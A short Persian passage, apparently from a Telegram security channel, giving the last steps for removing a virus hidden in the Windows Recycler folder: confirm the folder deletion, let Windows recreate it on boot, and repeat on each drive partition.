3- از شما سوالی پرسیده خواهد شد که آیا می خواهید این پوشه را حذف کنید شما کاراکتر Y را بزنید یعنی بله.
4- نگران نباشید در بارگذاری به صورت نرمال پوشه Recycler دوباره ساخته خواهد شد ولی دیگر درون آن ویروس نیست.
این عمل را برای همه ی پارتیشن های هارد کامپیوترتان تکرار کنید.
#amozesh #Deletedos
Author:AmHacker
🌹برترین کانال آموزش🌹
@FullSecurity